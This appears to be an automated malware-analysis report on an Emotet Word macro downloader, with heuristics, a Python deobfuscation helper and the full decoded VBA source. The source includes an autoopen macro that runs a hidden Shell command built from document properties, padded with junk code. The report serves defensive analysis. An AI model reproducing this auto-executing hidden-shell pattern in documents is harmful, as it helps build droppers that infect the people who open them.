Verdict: MALICIOUS
Risk Score: 210

Malware Insights

MITRE ATT&CK
- T1059.001 PowerShell
- T1566.001 Spearphishing Attachment
- T1059.005 Visual Basic
ClamAV identifies the sample as malicious with the signature 'Doc.Downloader.Emotet-6344335-3'. Static analysis recovered a VBA project whose autoopen macro does one thing: it calls the function ukWWdsK, which calls VBA.Shell$ with window style 0 (vbHide, no visible window). The command string is assembled at runtime by concatenating dozens of identifiers with two document properties, ActiveDocument.CustomDocumentProperties("ZpEkWFg") and ActiveDocument.BuiltInDocumentProperties("Comments"). None of those identifiers is assigned anywhere in the extracted module, so under VBA's default (no Option Explicit) each is an implicit Variant holding Empty and contributes an empty string; the executed command is effectively the custom property value followed by the Comments value, and On Error Resume Next suppresses any failure along the way. The command itself is therefore not visible in the macro source and has to be recovered from the document's property streams. The remaining Subs are arithmetic and loop junk that nothing calls and exist only to pad the module. Together with the SC_STR_POWERSHELL finding and the ClamAV signature, this layout (macro with an auto-exec entry point, hidden Shell, payload kept outside the VBA text) is characteristic of Emotet's document downloader, which typically launches PowerShell to fetch and run a second-stage payload.
Heuristics (7)

- ClamAV detection [critical, CLAMAV_DETECTION]: ClamAV detected this file as malware: Doc.Downloader.Emotet-6344335-3
- VBA macros detected [medium, OLE_VBA_MACROS, 2 related findings]: Document contains VBA macro code
- Potential Shell call in VBA [critical, OLE_VBA_SHELL]. Matched line in script (truncated by the report; the complete statement is in the macros.bas preview below):
  On Error Resume Next VBA.Shell$ "" + UWbfkwStSfN + TsvdGtsXy + CEksYkDDLPC + muCnTNfaDz + NHPPYeuBF + NhBKxbvDSCU + BHhpVSH + WwUHnAzPHH + ugxkHRTHwC + vfFPPPnCUf + ActiveDocument.CustomDocumentProperties("ZpEkWFg") + UWbfkwStSfN + TsvdGtsXy + CEksYkDDLPC + muCnTNfaDz + NHPPYeuBF + NhBKxbvDSCU + BHhpVSH + WwUHnAzPHH + ugxkHRTHwC + vfFPPPnCUf + ActiveDocument.BuiltInDocumentProperties("Comments") + UWbfkwStSfN + TsvdGtsXy + CEksYkDDLPC + muCnTNfaDz + NHPPYeuBF + NhBKxbvDSCU + BHhpVSH + WwUHnAzPHH + ugxkHRTHwC + vfFPP … End Function
- AutoOpen macro [low, OLE_VBA_AUTOOPEN]. Matched line in script:
  Sub autoopen() ukWWdsK
- Reference to PowerShell [high, SC_STR_POWERSHELL]: Reference to PowerShell
- Legacy WordBasic auto-exec macro marker [medium, OLE_LEGACY_WORDBASIC_AUTOEXEC]: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself. Note: this generic description conflicts with OLE_VBA_MACROS above, where a VBA project was recovered; for this sample the marker is the same autoopen entry point and adds no separate execution surface.
- Embedded URL [info, EMBEDDED_URL]: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL http://schemas.openxmlformats.org/drawingml/2006/main, in document text (OLE body). Note: this is the OOXML DrawingML namespace URI that appears in embedded drawing XML; it is never contacted at runtime and is not a network indicator for this sample.
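The Shell argument above is long but mostly inert, and the script below makes that explicit. It is an added example written for this report, not analyzer output or code from the sample: a regex-based reducer that classifies every operand of the '+' chain as a string literal, a document-property lookup, a procedure call, a variable the module assigns somewhere, or a name the module never assigns, and keeps only the operands that can contribute bytes to the command. It handles this module's flat concatenation style only, not general VBA expressions. The input is a constructed excerpt of the macros.bas preview (autoopen, ukWWdsK with the Shell line copied verbatim, and one junk Sub); that is sufficient because no other Sub in the module assigns any name used in the Shell argument.

```python
import re
from collections import Counter

# Constructed excerpt of the macros.bas preview from this report: the junk Sub vgYJ,
# the autoopen entry point, and ukWWdsK with its Shell statement copied verbatim.
VBA_SOURCE = r'''
Sub vgYJ(kHiis167)
On Error Resume Next
Dim jfjyp146z()
ReDim jfjyp146z(2)
jfjyp146z(0) = 441
jfjyp146z(1) = 14
sVS = tRTKlgHp - 147619628
End Sub
Sub autoopen()
ukWWdsK
End Sub
Public Function ukWWdsK()
On Error Resume Next
VBA.Shell$ "" + UWbfkwStSfN + TsvdGtsXy + CEksYkDDLPC + muCnTNfaDz + NHPPYeuBF + NhBKxbvDSCU + BHhpVSH + WwUHnAzPHH + ugxkHRTHwC + vfFPPPnCUf + ActiveDocument.CustomDocumentProperties("ZpEkWFg") + UWbfkwStSfN + TsvdGtsXy + CEksYkDDLPC + muCnTNfaDz + NHPPYeuBF + NhBKxbvDSCU + BHhpVSH + WwUHnAzPHH + ugxkHRTHwC + vfFPPPnCUf + ActiveDocument.BuiltInDocumentProperties("Comments") + UWbfkwStSfN + TsvdGtsXy + CEksYkDDLPC + muCnTNfaDz + NHPPYeuBF + NhBKxbvDSCU + BHhpVSH + WwUHnAzPHH + ugxkHRTHwC + vfFPPPnCUf + ZzNNgAY, 0
End Function
'''

# `[VBA.]Shell[$] <expression>, <windowstyle>` on a single line.
SHELL_RE = re.compile(r'^\s*(?:VBA\.)?Shell\$?\s+(?P<expr>.+?)\s*,\s*(?P<style>\d+)\s*$', re.M)
# One operand of the '+' chain: a string literal, or a dotted name with an optional ("...") argument.
OPERAND_RE = re.compile(r'"[^"]*"|[A-Za-z_]\w*(?:\.[A-Za-z_]\w*)*(?:\("[^"]*"\))?')
# Places where a name can receive a value: assignment, Dim/ReDim, For/For Each, procedure parameters.
ASSIGN_RE = re.compile(r'^\s*(?:Set\s+)?([A-Za-z_]\w*)\s*(?:\([^)]*\))?\s*=', re.M)
DIM_RE = re.compile(r'^\s*(?:Re)?Dim\s+(.+)$', re.M)
FOR_RE = re.compile(r'^\s*For\s+(?:Each\s+)?([A-Za-z_]\w*)', re.M)
PROC_RE = re.compile(r'^\s*(?:Public\s+|Private\s+)?(?:Sub|Function)\s+([A-Za-z_]\w*)\s*(?:\(([^)]*)\))?', re.M)
PROP_RE = re.compile(r'^ActiveDocument\.(CustomDocumentProperties|BuiltInDocumentProperties)\("([^"]*)"\)$')


def assigned_names(source):
    """Every name that receives a value somewhere in the module."""
    names = set(ASSIGN_RE.findall(source)) | set(FOR_RE.findall(source))
    for decl in DIM_RE.findall(source):
        for chunk in decl.split(','):
            m = re.match(r'\s*([A-Za-z_]\w*)', chunk)
            if m:
                names.add(m.group(1))
    for _, params in PROC_RE.findall(source):
        for chunk in params.split(','):
            m = re.match(r'\s*(?:(?:ByVal|ByRef|Optional)\s+)*([A-Za-z_]\w*)', chunk)
            if m:
                names.add(m.group(1))
    return names


def classify(token, assigned, procs):
    if token.startswith('"'):
        return 'literal'
    if PROP_RE.match(token):
        return 'document property'
    if token in procs:
        return 'procedure call'
    if token in assigned:
        return 'assigned variable'
    # Without Option Explicit a never-assigned name is an implicit Variant holding Empty,
    # and "" + Empty is ""; with On Error Resume Next nothing interrupts the statement.
    return 'unassigned (Empty)'


def reduce_shell_command(source):
    """Return the Shell window style, every classified operand, and the operands that can carry data."""
    m = SHELL_RE.search(source)
    if m is None:
        raise ValueError('no Shell call in module')
    operands = OPERAND_RE.findall(m.group('expr'))
    assigned = assigned_names(source)
    procs = {name for name, _ in PROC_RE.findall(source)}
    classified = [(tok, classify(tok, assigned, procs)) for tok in operands]
    reduced = [tok for tok, kind in classified if kind != 'unassigned (Empty)' and tok != '""']
    properties = [PROP_RE.match(tok).groups() for tok in reduced if PROP_RE.match(tok)]
    return {
        'window_style': int(m.group('style')),  # 0 is vbHide: the spawned process gets no window
        'operands': classified,
        'kinds': Counter(kind for _, kind in classified),
        'reduced': reduced,
        'properties': properties,
    }


if __name__ == '__main__':
    result = reduce_shell_command(VBA_SOURCE)
    print('window style:', result['window_style'])
    print('operand kinds:', dict(result['kinds']))
    print('effective command = ' + ' + '.join(result['reduced']))
    for collection, name in result['properties']:
        print(f'recover ActiveDocument.{collection}("{name}") from the OLE property streams')
```

Run stand-alone, it reports 34 operands of which 31 are never-assigned names, and an effective command of CustomDocumentProperties("ZpEkWFg") followed by BuiltInDocumentProperties("Comments"), launched with window style 0. Neither value is in the VBA project: Comments lives in the SummaryInformation property set (olefile's OleFileIO.get_metadata().comments returns it), while a custom property such as ZpEkWFg sits in the user-defined section of the DocumentSummaryInformation stream, which needs a property-set parser or Word automation with macro execution disabled. Whatever those two properties hold is the real downloader command and the indicator worth extracting.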
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 3765 bytes | 079b4afe971b2ee43151414f94c7deccbdb73af1d6d2a0461a6e8b927a909c56 |

Preview script: first 1,000 lines of the extracted script (the module is well under that cap, so the listing below is the complete decoded source).
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "Module1"
Sub FMGAn24cV()
On Error Resume Next
Select Case cFmIw
Case 8059
wUhL25 = 2636
GpzXy = Jlzd789p
UWiZ = 482
Case 6364
HfiuK0K8 = XiLc
shtE = Round(RQUnj832I + ChrB(tGjztO8))
huYs7195 = Int(252065587 * 127 * 204048515 + CLng(IBL))
Case 46
IKWt3M788 = Fix(cTuwVw8 * CByte(BLux6x4G / Tan(29285969)) * 709 * zDNle7)
YwAYF = odu
CZk = CStr(278725002)
End Select
Set xjQY96L = 3
End Sub
Sub vgYJ(kHiis167)
On Error Resume Next
Dim jfjyp146z()
ReDim jfjyp146z(2)
jfjyp146z(0) = 441
jfjyp146z(1) = 14
yYzpN2 = (GMOz7Gjx / CDate(XIsh) * XKEimT1 + 7391 * (9 - CStr(15 * CStr(1)) * 204179029 / Round(SIi)))
sVS = tRTKlgHp - 147619628
End Sub
Sub autoopen()
ukWWdsK
End Sub
Sub FHjEj(LAcQVZ87)
On Error Resume Next
Do
Dim lJeuDE96, nqrjpo6
neGow086 = 4163
AkQCgA = 294325181 - 51502176
Loop Until bwvS69z8z >= 13
Do While JKyP8pxto Eqv 10
For Each ZJyu In NBZq5Y
oYwx = UlaI61M1 / fph * 498373131 / vrGbz * (86 * CDate(4003) * (93 + Int(Lyrs) / 28188549 - ChrW(hlpn60H)))
Next
Set vRSb9W = 3
Select Case tJBR
Case 407850943
jaum6Cn = ChrB(3641 * Hex(EzHUi2E))
NCskA = CjuvT
rSZ = CBool(Act)
Case 1
crvr = 368
xgQY = ocXUh23
QXvYq42qV = xzak9Z2
Case 513122720
vLZp = ChrB(233198461)
eObu66H03 = 8
vxQ = 385391781
End Select
Set ZWbLW1X89 = DzyG
Loop
End Sub
Sub sSYfU0(SpsW4rP)
On Error Resume Next
XtaW = 252633654 - Rnd(JHd / Chr(RzwyI3)) * 582 - CSng(67 / 61 + UuzY46cs5 - CStr(404047675)) / 67 * RJpk5xi38 / 271545299 + CStr(77 + CByte(13 - Atn(64 - mTgJ * 284735532 / 32)) - 43 - CLng(ZdgH93I))
YSuN0x5D = 229040495 / 36292429
zFcxbS = (8 / CStr(UEi) + (ZRhr + jKDn0 - 14 / GDs * (EYA * CSng(345020765 * bQZ) - SsI / Cos(uAwx3Vije))))
End Sub
Public Function ukWWdsK()
On Error Resume Next
VBA.Shell$ "" + UWbfkwStSfN + TsvdGtsXy + CEksYkDDLPC + muCnTNfaDz + NHPPYeuBF + NhBKxbvDSCU + BHhpVSH + WwUHnAzPHH + ugxkHRTHwC + vfFPPPnCUf + ActiveDocument.CustomDocumentProperties("ZpEkWFg") + UWbfkwStSfN + TsvdGtsXy + CEksYkDDLPC + muCnTNfaDz + NHPPYeuBF + NhBKxbvDSCU + BHhpVSH + WwUHnAzPHH + ugxkHRTHwC + vfFPPPnCUf + ActiveDocument.BuiltInDocumentProperties("Comments") + UWbfkwStSfN + TsvdGtsXy + CEksYkDDLPC + muCnTNfaDz + NHPPYeuBF + NhBKxbvDSCU + BHhpVSH + WwUHnAzPHH + ugxkHRTHwC + vfFPPPnCUf + ZzNNgAY, 0
End Function
Sub JMQObR0()
On Error Resume Next
Lphmp5 = MDxY8q2 * uvPIG51Hm
Uvcq = 314659417 * 465999738
End Sub
Sub wXFp7reR9()
On Error Resume Next
Do While kcJf > lkPIt4
For Each GIyl In OvCk
PLPbA5 = Cos(188802468)
Next
For Each MqSKJ6f In ORvWe4F5
noUx84A = 598
Next
For qiUPL4Ycs = cinf02 To DJpsd633
FcHCQ5Ol = 531668891 * Chr(tWAv7fc2 / 401 - oOnx * Hex(22 + Log(238889098))) * yqAGY + Atn(URVKDhE26) * 933 / Fix(OUEk5 * Sin(193) - 9312 - Round(gXeSX11e)) * 699 - Round(lEol06) + 1648 - Round(299506984)
Next
Do
cgXl1L = PVFdrkie * Int(7) * ZPWvW0 / Cos(6789) - 9 + Tnbf086
Loop Until xbKi8920 > 6
EFRQ1 = 334953148 * wLRi7
Loop
RSFC2F12 = mcgVq3X - 251107387
End Sub